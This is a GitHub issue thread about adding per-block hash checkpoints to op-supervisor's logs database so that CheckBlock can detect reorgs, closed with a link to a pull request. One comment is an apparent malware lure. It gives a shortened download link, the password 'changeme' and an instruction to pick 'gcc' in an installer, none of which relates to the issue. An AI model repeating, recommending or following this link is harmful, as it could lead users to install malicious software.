### ISSUE TITLE
op-supervisor: track every block hash

### ISSUE THREAD

**Issue by axelKingsley** [ethereum-optimism/optimism#11612]
Today, the logs database in op-supervisor tracks all logs as fixed-width structures, and inserts a "Checkpoint" every 256 entries.

Using an iterator to get the next Log gets you:
* The index within the database
* The block number of the event
* The hash *of the event*

There is no included hash *of the block*. Because of that, calls to `CheckBlock` on the supervisor currently have no way of validating the block hash.

This is only a problem when tracking and responding to reorgs, as the block number and log index are sufficient to determine the presence and validity of an executing message. However, we want to be able to consider the block hash when responding to these calls.

### The Task:
Add Search Checkpoints *always* at the end of a block when writing it into the database. We would still include checkpoints every 256 entries, but now there would be an additional set of markers at the end of each block which reveal the block hash.
Then, when `CheckBlock` runs, it scans through to the end of the block, using the index to determine safety, and also uses the newly included block hash checkpoint to consider potential reorg happenings.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by protolambda** [comment]
Closed by https://github.com/ethereum-optimism/optimism/pull/11989
